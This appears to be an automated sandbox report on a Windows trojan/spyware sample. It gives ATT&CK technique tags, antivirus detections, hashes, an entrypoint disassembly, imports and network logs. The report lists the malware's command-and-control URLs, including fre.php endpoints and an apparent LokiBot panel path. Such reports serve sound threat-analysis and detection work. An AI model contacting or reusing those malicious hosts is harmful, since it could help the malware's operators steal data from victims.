                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        unpacked.exe100%AviraTR/Crypt.XPACK.Gen
                        unpacked.exe100%Joe Sandbox ML

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        0.0.unpacked.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        0.2.unpacked.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                        Domains

                        SourceDetectionScannerLabelLink
                        firenzelavori.lt10%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                        http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                        http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                        http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                        http://alphastand.win/alien/fre.php0%URL Reputationsafe
                        http://alphastand.win/alien/fre.php0%URL Reputationsafe
                        http://alphastand.win/alien/fre.php0%URL Reputationsafe
                        http://alphastand.win/alien/fre.php0%URL Reputationsafe
                        http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                        http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                        http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                        http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                        https://firenzelavori.lt/loki/Panel/five/fre.php10%VirustotalBrowse
                        https://firenzelavori.lt/loki/Panel/five/fre.php0%Avira URL Cloudsafe
                        http://alphastand.top/alien/fre.php0%URL Reputationsafe
                        http://alphastand.top/alien/fre.php0%URL Reputationsafe
                        http://alphastand.top/alien/fre.php0%URL Reputationsafe
                        http://alphastand.top/alien/fre.php0%URL Reputationsafe
                        http://www.ibsensoftware.com/0%URL Reputationsafe
                        http://www.ibsensoftware.com/0%URL Reputationsafe
                        http://www.ibsensoftware.com/0%URL Reputationsafe
                        http://www.ibsensoftware.com/0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        firenzelavori.lt
                        unknown
                        unknowntrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://kbfvzoboss.bid/alien/fre.phptrue
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://alphastand.win/alien/fre.phptrue
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://alphastand.trade/alien/fre.phptrue
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://alphastand.top/alien/fre.phptrue
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://firenzelavori.lt/loki/Panel/five/fre.phpunpacked.exe, 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmptrue
                        • 10%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.ibsensoftware.com/unpacked.exefalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown

                        Contacted IPs

                        No contacted IP infos

                        General Information

                        Joe Sandbox Version:32.0.0 Black Diamond
                        Analysis ID:431544
                        Start date:08.06.2021
                        Start time:21:45:03
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 4m 44s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:unpacked.bin (renamed file extension from bin to exe)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:16
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@1/2@157/0
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 100% (good quality ratio 95.9%)
                        • Quality average: 76.9%
                        • Quality standard deviation: 28.7%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 20.82.210.154, 52.147.198.201, 204.79.197.200, 13.107.21.200, 168.61.161.212, 23.54.113.53, 13.88.21.125, 13.64.90.137, 40.88.32.150, 104.43.193.48, 20.54.7.98, 20.54.26.129, 8.248.145.254, 8.241.9.126, 8.241.11.254, 8.248.135.254, 8.253.95.121, 20.54.104.15, 92.122.213.247, 92.122.213.194
                        • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        21:46:02API Interceptor26x Sleep call for process: unpacked.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASN

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                        Process:C:\Users\user\Desktop\unpacked.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview: 1
                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                        Process:C:\Users\user\Desktop\unpacked.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10718
                        Entropy (8bit):0.6039339853994985
                        Encrypted:false
                        SSDEEP:12:4/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/gg:w
                        MD5:C7ADD3D3A64EBD1148853BB23AFBA9BB
                        SHA1:B5D425C10D7730DB432E9B0DCC74707132299F86
                        SHA-256:AF8070E934B1B40B485E661925D15D2A5B362A6924B3B7F7FFF6AF9373BAF7BA
                        SHA-512:19D4BA9560BE7F43FC7F2F86A5F9BE2CE3F11D46F99EF4FA0652364702FF42A62E9E363CA25B9B0319F1D5508B3BB5C9850266C6CAC086A74005A1A99697A8EC
                        Malicious:false
                        Reputation:low
                        Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.054379657980403
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:unpacked.exe
                        File size:106496
                        MD5:1917f888cacd48b9a8d4832449e8d34f
                        SHA1:d732e6a78ea44b77943c1e74e19c9ea92d0b7a28
                        SHA256:3deeb55fefe05f51c41b1724780e5de1e33a432e01f455e3ab5d2af5ca655464
                        SHA512:901b095813605c89945e1b5354fef210b0a68d94a79156b5d405116c5f00a15571046a0e9d65830cdaea8a3deda657a6d4ac6744ecef30cca6b26033d8b61b55
                        SSDEEP:1536:czvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqfIzmd:nSHIG6mQwGmfOQd8YhY0/EqUG
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x.....................K.K.............=2......................................=2......=2......Rich............PE..L.....lW...

                        File Icon

                        Icon Hash:00828e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x4139de
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        DLL Characteristics:TERMINAL_SERVER_AWARE
                        Time Stamp:0x576C0885 [Thu Jun 23 16:04:21 2016 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:0239fd611af3d0e9b0c46c5837c80e09

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        push ecx
                        and dword ptr [ebp-04h], 00000000h
                        lea eax, dword ptr [ebp-04h]
                        push esi
                        push edi
                        push eax
                        call 00007F59A47A49D9h
                        push eax
                        call 00007F59A47A49B6h
                        xor esi, esi
                        mov edi, eax
                        pop ecx
                        pop ecx
                        cmp dword ptr [ebp-04h], esi
                        jle 00007F59A47A4B96h
                        push 004188BCh
                        push dword ptr [edi+esi*4]
                        call 00007F59A4797065h
                        pop ecx
                        pop ecx
                        test eax, eax
                        je 00007F59A47A4B7Dh
                        push 00002710h
                        call 00007F59A479791Ah
                        pop ecx
                        inc esi
                        cmp esi, dword ptr [ebp-04h]
                        jl 00007F59A47A4B4Eh
                        push 00000000h
                        call 00007F59A47A49AEh
                        push 00000000h
                        call 00007F59A47A4CC2h
                        pop ecx
                        pop edi
                        xor eax, eax
                        pop esi
                        mov esp, ebp
                        pop ebp
                        retn 0010h
                        push ebp
                        mov ebp, esp
                        xor eax, eax
                        push eax
                        push eax
                        push E567384Dh
                        push eax
                        call 00007F59A4794309h
                        push dword ptr [ebp+08h]
                        call eax
                        pop ebp
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        mov esi, dword ptr [ebp+08h]
                        test esi, esi
                        je 00007F59A47A4BD4h
                        push esi
                        call 00007F59A4796E30h
                        pop ecx
                        test eax, eax
                        je 00007F59A47A4BC9h
                        push esi
                        call 00007F59A4794E6Ch
                        pop ecx
                        test eax, eax
                        je 00007F59A47A4BBEh
                        mov eax, dword ptr [0049FDECh]
                        cmp dword ptr [ebp+10h], 00000000h
                        cmovne eax, dword ptr [ebp+10h]
                        push eax
                        push dword ptr [0049FDE8h]
                        call 00007F59A4796864h
                        push dword ptr [ebp+0Ch]
                        push dword ptr [0049FDE8h]
                        call 00007F59A4796856h
                        push 00000000h
                        push 00000000h
                        push esi

                        Rich Headers

                        Programming Language:
                        • [ASM] VS2008 SP1 build 30729
                        • [ASM] VS2003 (.NET) build 3077
                        • [ C ] VS2008 SP1 build 30729
                        • [LNK] VS2013 UPD5 build 40629
                        • [C++] VS2013 UPD5 build 40629
                        • [IMP] VS2008 SP1 build 30729

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x18ed00x64.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x150000x5c.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x136f50x13800False0.568509615385data6.49204829439IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata0x150000x40600x4200False0.365944602273data4.25599948305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x1a0000x85e240x200False0.056640625data0.321716074313IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .x0xa00000x20000x2000False0.0194091796875data0.215612772574IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                        Imports

                        DLLImport
                        WS2_32.dllgetaddrinfo, freeaddrinfo, closesocket, WSAStartup, socket, send, recv, connect
                        KERNEL32.dllGetProcessHeap, HeapFree, HeapAlloc, SetLastError, GetLastError
                        ole32.dllCoCreateInstance, CoInitialize, CoUninitialize
                        OLEAUT32.dllVariantInit, SysFreeString, SysAllocString

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        06/08/21-21:45:54.964981ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:45:56.099009ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:45:57.298036ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:45:58.656733ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:00.751806ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:01.754117ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:02.956035ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:04.041251ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:05.052317ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:06.495672ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:07.523806ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:08.667938ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:10.878494ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:11.909233ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:13.112330ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:14.141931ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:15.412834ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:16.459862ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:17.552955ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:18.558916ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:20.849702ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:22.067990ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:22.966525ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:24.303998ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:25.381509ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:26.549659ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:27.582089ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:29.147828ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:30.159692ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:31.392048ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:32.534581ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:34.568874ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:36.930081ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:39.055318ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:41.273154ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:42.322420ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:43.383142ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:44.412509ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:46.192174ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:48.177418ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:49.217508ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:50.474508ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:51.461367ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:52.631150ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:53.835880ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:55.850179ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:56.895356ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:57.928431ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:46:59.167510ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:00.166543ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:01.306661ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:02.311429ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:03.650406ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:04.635429ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:05.742289ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:06.741761ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:09.007209ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:10.111150ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:11.101358ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:12.360436ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:13.478896ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:15.729908ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:16.714200ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:18.537071ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:21.017088ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:23.136770ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:24.175057ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:25.384551ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:26.427195ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:27.523031ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:28.824177ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:29.824469ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:30.916586ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:33.152055ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:34.167246ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:35.231782ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:36.266106ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:37.494183ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:38.520658ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:39.622604ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:41.862796ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:44.070337ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:45.015619ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:46.256576ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:47.254045ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:48.341446ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:49.365798ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:50.575788ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:52.731560ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:53.965149ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        06/08/21-21:47:56.097590ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8

                        Network Port Distribution

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jun 8, 2021 21:45:43.562550068 CEST5372353192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:43.606097937 CEST53537238.8.8.8192.168.2.4
                        Jun 8, 2021 21:45:43.945187092 CEST6464653192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:43.989876986 CEST53646468.8.8.8192.168.2.4
                        Jun 8, 2021 21:45:44.016258955 CEST6529853192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:44.075732946 CEST53652988.8.8.8192.168.2.4
                        Jun 8, 2021 21:45:44.701061010 CEST5912353192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:44.743454933 CEST53591238.8.8.8192.168.2.4
                        Jun 8, 2021 21:45:45.622090101 CEST5453153192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:45.665627003 CEST53545318.8.8.8192.168.2.4
                        Jun 8, 2021 21:45:47.177716970 CEST4971453192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:47.222187042 CEST53497148.8.8.8192.168.2.4
                        Jun 8, 2021 21:45:51.877125025 CEST5802853192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:52.904454947 CEST5802853192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:53.949357033 CEST5802853192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:54.031042099 CEST53580288.8.8.8192.168.2.4
                        Jun 8, 2021 21:45:54.131951094 CEST5309753192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:54.964849949 CEST53580288.8.8.8192.168.2.4
                        Jun 8, 2021 21:45:55.152808905 CEST5309753192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:55.283318996 CEST53530978.8.8.8192.168.2.4
                        Jun 8, 2021 21:45:55.462305069 CEST4925753192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:56.096419096 CEST53580288.8.8.8192.168.2.4
                        Jun 8, 2021 21:45:56.496690035 CEST4925753192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:57.297934055 CEST53530978.8.8.8192.168.2.4
                        Jun 8, 2021 21:45:57.530993938 CEST53492578.8.8.8192.168.2.4
                        Jun 8, 2021 21:45:57.594887972 CEST6238953192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:58.606086016 CEST6238953192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:58.656579018 CEST53492578.8.8.8192.168.2.4
                        Jun 8, 2021 21:45:59.606571913 CEST6238953192.168.2.48.8.8.8
                        Jun 8, 2021 21:45:59.748205900 CEST53623898.8.8.8192.168.2.4
                        Jun 8, 2021 21:45:59.883620977 CEST4991053192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:00.751663923 CEST53623898.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:00.903748035 CEST4991053192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:01.754004955 CEST53623898.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:01.950437069 CEST4991053192.168.2.48.8.8.8
